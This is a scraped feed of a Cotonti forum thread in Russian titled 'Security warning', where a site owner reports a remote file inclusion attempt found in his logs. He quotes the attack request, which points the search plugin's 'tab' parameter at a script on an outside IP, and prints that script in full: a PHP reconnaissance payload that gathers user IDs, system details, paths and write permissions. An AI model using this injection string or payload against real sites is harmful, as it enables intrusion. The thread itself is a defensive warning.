cotonti.com : Security warning https://www.cotonti.com Son konu mesajları Cotonti en Fri, 30 Jan 2026 12:00:43 -0000 Trustmaster Çrş, 16 Ara 2009 15:50:20 -0000 Sain Çrş, 16 Ara 2009 05:48:04 -0000 Alex300 ]]> Çrş, 16 Ara 2009 05:38:00 -0000 Sain # Kort : ясно. а я лет 5 уже мучаюсь вопросом

Главное, что б в инклуд файле не было руткида или чего-то такого. Не знаю, как старые версии Седитио, но Котонти от таких атак защищен. И это не может не радовать))]]> Çrş, 16 Ara 2009 04:53:56 -0000 Kort Çrş, 16 Ara 2009 04:42:58 -0000 Sain # Kort : У меня такими хаками все логи забиты

Эти инклуды являются типичным примером СЕ-атак(Command Execution Attack).]]> Çrş, 16 Ara 2009 03:59:28 -0000 Kort Çrş, 16 Ara 2009 03:36:41 -0000 Sain # Yusupov : Так Ваш сайт хакнули или нет?
Нет, вовремя заметил инклуды

Добавлено 1 Минута спустя:

]]> Çrş, 16 Ara 2009 02:08:40 -0000 Yusupov Çrş, 16 Ara 2009 02:06:17 -0000 Sain Как все начиналось. Заливая контент, заглянул в системный лог. Нашел там интересное сообщение системы безопасности:
A variable type check failed, expecting G/ALP for 'tab' : http://201.134.249.164/intranet/on.txt? - /plug.php?e=search&tab=http://201.134.249.164/intranet/on.txt?

Как видим, хакер инклуднуть в форму поиска вот этот скрипт: http://201.134.249.164/intranet/on.txt?
Попробовал зайти по этому адресу, но Авира заблокировал доступ. После отключения антивируса скачал файлик. Вот его содержимое:

<?php
  closelog( );
  $user = get_current_user( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $ver = phpversion( );
  $gid = posix_getgid( );
  if ($chdir == "") $chdir = getcwd( );
  if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">

<?php
  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {
?>
  <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><span style="font-size: 9pt"><b>
		<?= $info ?>
      :</b> <?= $value ?></DIV></TD>
  </TR>
<?php
  }
?>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

	<span style="font-size: 9pt"><b>
    User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
  </TR>
  <TR>

  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Current Path:</b> <?= $chdir ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

    </span></DIV></TD>
  </TR>  
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
    </span></DIV></TD>
  </TR>

  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

	<span style="font-size: 9pt"><b>
    Script Current User:</b> <?= $user ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
	<span style="font-size: 9pt"><b>
    PHP Version:</b> <?= $ver ?></span></DIV></TD>

  </TR>
</TABLE>

Инфа о серваке – половина успешного взлома. Так что заблокируйте доступ к серверу со следующих Ip:
201.134.249.164 – адрес, где скрипт для инклуда
204.236.*.* - подсеть хакера]]> Çrş, 16 Ara 2009 01:54:30 -0000